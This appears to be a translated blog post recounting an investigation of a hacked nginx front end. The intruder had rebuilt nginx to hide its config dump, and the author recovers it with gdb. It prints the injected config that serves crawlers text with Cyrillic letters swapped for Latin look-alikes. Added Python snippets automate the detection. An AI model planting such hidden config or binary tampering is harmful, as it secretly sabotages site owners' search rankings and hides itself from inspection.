An unpleasant story happened to an acquaintance of mine. But, as unpleasant as it was for Mikhail, it was just as interesting for me.
I must say that my friend is a perfectly sane UNIX user: he can install mysql on a system himself and do the simplest nginx configuration.
And he has a dozen or so sites dedicated to construction tools.
One of them, a site about chainsaws, sits at the top of the search engine rankings. It is a non-commercial review site, but someone got tired of it and started attacking it: DDoS, then brute force, then spam comments and abuse complaints sent to the hosting provider and to RKN.
Suddenly everything went quiet, and that quiet turned out to be a bad sign: the site began slowly sliding out of the top lines of the search results.

That was the preface; now the story as told by the admin himself.
It was almost bedtime when my phone rang: "Sanya, can you take a look at my server? I think I've been hacked. I can't prove it, but I've had this feeling for three weeks now. Maybe it's time for some medication for my paranoia?"
What followed was a half-hour discussion that can be summarized as follows:
- the site was a very tempting target for a hack;
- the attacker could have obtained superuser rights;
- the attack (if it happened) was targeted at this specific site;
- the problem areas have been fixed, and all that remains is to find out whether the intrusion really happened;
- the hack could not have affected the site's code and databases.
On the last point.

Only the frontend's public IP is exposed to the world. There is no communication between the backends and the frontend other than http(s), users and passwords differ everywhere, and no keys were exchanged. On the private addresses all ports except 80/443 are closed. The backends' public IPs are known only to two users whom Mikhail trusts completely.
Debian 9 was installed on the frontend, and at the time of the call the system had been cut off from the world by an external firewall and stopped.
"Okay, give me access," I decided to put off sleep for an hour. "I'll see for myself."
Everywhere below:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Looking for a possible hack
I start the server, first in rescue mode, mount the disks and wander through them. I check logs, shell history, system journals and so on; where possible I look at file modification dates, although I understand that a competent attacker "cleans up" after himself, and that Misha had already "trampled" a lot while searching on his own.
Booting in normal mode, I still don't know what to look for, so I study the configs. My main interest is nginx, since, by and large, there is nothing else on the frontend.
The configs are small and neatly laid out in a dozen files; I simply read them one by one with cat. Everything seems clean, but maybe I missed some include, so I'll make a full listing:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
I don't get it: "Where's the listing?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
The question about the listing was joined by a second one: "Why is the nginx version so old?"
Moreover, the system believes that the installed version is the latest one:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
I call him:
- Mish, why did you rebuild nginx?
- Come to your senses, I don't even know how to do that!
- Okay, go to sleep...
nginx was rebuilt, and the "-T" listing output was hidden for some reason. There is no doubt about the hack any more, so we could simply accept it and (since Misha had already replaced the server with a new one) consider the problem solved.
And indeed, once someone has obtained root rights, the only sensible thing to do is reinstall the system, and there is no point in picking through what was done there; but this time curiosity won over sleep. How can we find out what they wanted to hide from us?
Let's try tracing:
$ strace nginx -T
Looking at the trace, we see that lines like the following are clearly missing:
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Out of curiosity, let's compare the outputs:
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
I assume that this fragment of code in /src/core/nginx.c
    case 't':
        ngx_test_config = 1;
        break;
    case 'T':
        ngx_test_config = 1;
        ngx_dump_config = 1;
        break;
was turned into:
    case 't':
        ngx_test_config = 1;
        break;
    case 'T':
        ngx_test_config = 1;
        //ngx_dump_config = 1;
        break;
or
    case 't':
        ngx_test_config = 1;
        break;
    case 'T':
        ngx_test_config = 1;
        ngx_dump_config = 0;
        break;
which is why the listing for "-T" is not printed.
But how can we see our config?
If my guess is right and the problem is only in the ngx_dump_config variable, let's try setting it with gdb, thanks to the --with-cc-opt='-g' option being present, and hoping that the -O2 optimization won't get in our way. However, since I don't know exactly how ngx_dump_config could have been tampered with inside case 'T':, we won't go through that block at all but will set the variable while using case 't':
Why can '-t' and '-T' be used interchangeably here? The if (ngx_dump_config) block is executed inside if (ngx_test_config):
    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }
        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;
            for (i = 0; i < cycle->config_dump.nelts; i++) {
                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);
                b = cd[i].buffer;
                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }
        return 0;
    }
Of course, if the code was changed in this section rather than in case 'T':, my approach will not work.
Test nginx.conf
After first localizing the problem through experiments, it was established that the minimal config needed for the malicious nginx behaviour to show itself is:
events {
}
http {
    include /etc/nginx/sites-enabled/*;
}
For brevity, we use it throughout the article.
Let's start the debugger:
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Step by step:
- set a breakpoint in main()
- start the program
- change the value of the variable that controls config output: ngx_dump_config=1
- continue/finish the program
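The gdb steps above as a non-interactive script, added here as an example rather than code from the article: it runs gdb in batch mode, parses the forced dump and reports any section that no file on disk accounts for. force_config_dump, parse_dump and diff_with_disk are names assumed here, and running it needs gdb plus an nginx built with -g, as on this server.

```python
import subprocess

# The article's gdb session, made non-interactive: stop in main(), force the
# dump flag on, then let "nginx -t" run to completion and print the config.
GDB_CMDS = ["break main", "run", "print ngx_dump_config=1", "continue"]


def force_config_dump(nginx="nginx"):
    """Return stdout of 'nginx -t' with ngx_dump_config forced to 1 via gdb."""
    cmd = ["gdb", "--batch", "--silent"]
    for c in GDB_CMDS:
        cmd += ["-ex", c]
    cmd += ["--args", nginx, "-t"]
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


def parse_dump(text):
    """Split the '# configuration file PATH:' sections into {path: body}."""
    marker = "# configuration file "
    sections, path, body = {}, None, []
    for line in text.splitlines():
        if line.startswith(marker) and line.endswith(":"):
            if path is not None:
                sections[path] = "\n".join(body) + "\n"
            path, body = line[len(marker):-1], []
        elif line.startswith("[Inferior "):     # gdb's own exit notice
            continue
        elif path is not None:
            body.append(line)
    if path is not None:
        sections[path] = "\n".join(body) + "\n"
    return sections


def diff_with_disk(sections):
    """Paths whose dumped body differs from the file on disk (or is missing)."""
    mismatched = []
    for path, dumped in sections.items():
        try:
            with open(path, encoding="utf-8") as fh:
                on_disk = fh.read()
        except OSError:
            mismatched.append(path)
            continue
        if on_disk.strip() != dumped.strip():
            mismatched.append(path)
    return mismatched
```

On the suspect host, `diff_with_disk(parse_dump(force_config_dump()))` lists every config path whose served content is not what the file contains; config that nginx serves but no file holds is exactly what the rebuilt binary was hiding.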
As we can see, the real config differs from ours. Let's extract the parasitic part from it:
map $http_user_agent $sign_user_agent
{
    "~*yandex.com/bots" 1;
    "~*www.google.com/bot.html" 1;
    default 0;
}
map $uri $sign_uri
{
    "~*/wp-" 1;
    default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
    о:1:0 o;
    default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
    а:1:0 a;
    default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Let's go through what happens here, in order.
The User-Agent of Yandex/Google is detected:
map $http_user_agent $sign_user_agent
{
    "~*yandex.com/bots" 1;
    "~*www.google.com/bot.html" 1;
    default 0;
}
WordPress service pages are excluded:
map $uri $sign_uri
{
    "~*/wp-" 1;
    default 0;
}
And for requests that meet both conditions above
map о:$sign_user_agent:$sign_uri $sign_o
{
    о:1:0 o;
    default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
    а:1:0 a;
    default а;
}
the Cyrillic letters о and а in the HTML page text are replaced with their Latin look-alikes o and a:
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Yes, the only subtlety is that 'о' != 'o' (Cyrillic on the left, Latin on the right):

So the search engine robots receive mangled text stuffed with Latin letters instead of 100% normal Cyrillic text. I can't judge exactly how this affects SEO, but such a mixture of letters is hardly going to have a positive effect on the search results.
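An added example, not from the article, that models the recovered map/sub_filter rules in Python and shows the check a site owner can run from outside: fetch the same page with a crawler's User-Agent and with a browser's, and look for words that mix Cyrillic and Latin letters. The rule patterns are the ones in the dump above; cloak, mixed_script_words, cloaking_detected and the sample HTML are constructed here.

```python
import re
import unicodedata

# nginx 'map' keys with "~*" are case-insensitive regexes; the unescaped dots
# are kept exactly as they appear in the recovered config.
BOT_UA = re.compile(r"yandex.com/bots|www.google.com/bot.html", re.I)
WP_URI = re.compile(r"/wp-", re.I)
CYR_O, LAT_O = "\u043e", "o"   # the two 'o's from the config
CYR_A, LAT_A = "\u0430", "a"   # the two 'a's


def cloak(html, user_agent, uri):
    """What the parasitic config does to a response: crawlers fetching
    non-WordPress URIs get Cyrillic о/а swapped for Latin o/a."""
    sign_ua = 1 if BOT_UA.search(user_agent) else 0
    sign_uri = 1 if WP_URI.search(uri) else 0
    if sign_ua == 1 and sign_uri == 0:          # map key "о:1:0"
        return html.replace(CYR_O, LAT_O).replace(CYR_A, LAT_A)
    return html                                 # "default о"


def mixed_script_words(text):
    """Words containing both Cyrillic and Latin letters: the fingerprint a
    crawler would see. Normal Russian text has none."""
    found = []
    for word in re.findall(r"\w+", text):
        scripts = {unicodedata.name(ch).split()[0] for ch in word if ch.isalpha()}
        if {"CYRILLIC", "LATIN"} <= scripts:
            found.append(word)
    return found


# Constructed sample page body (Russian text about chainsaws) and crawler UA
SAMPLE_HTML = "<p>бензопила для дома и сада</p>"
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def cloaking_detected(html, bot_ua=GOOGLEBOT, uri="/"):
    """Compare what a browser and a crawler receive for the same URI."""
    return mixed_script_words(cloak(html, bot_ua, uri)) != mixed_script_words(
        cloak(html, "Mozilla/5.0 Firefox", uri)
    )
```

Against a live site, feed mixed_script_words the body returned for a crawler User-Agent and for a browser one; any difference between the two lists means the server is serving crawlers something different.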
What can I say, people with imagination.
Source: www.habr.com
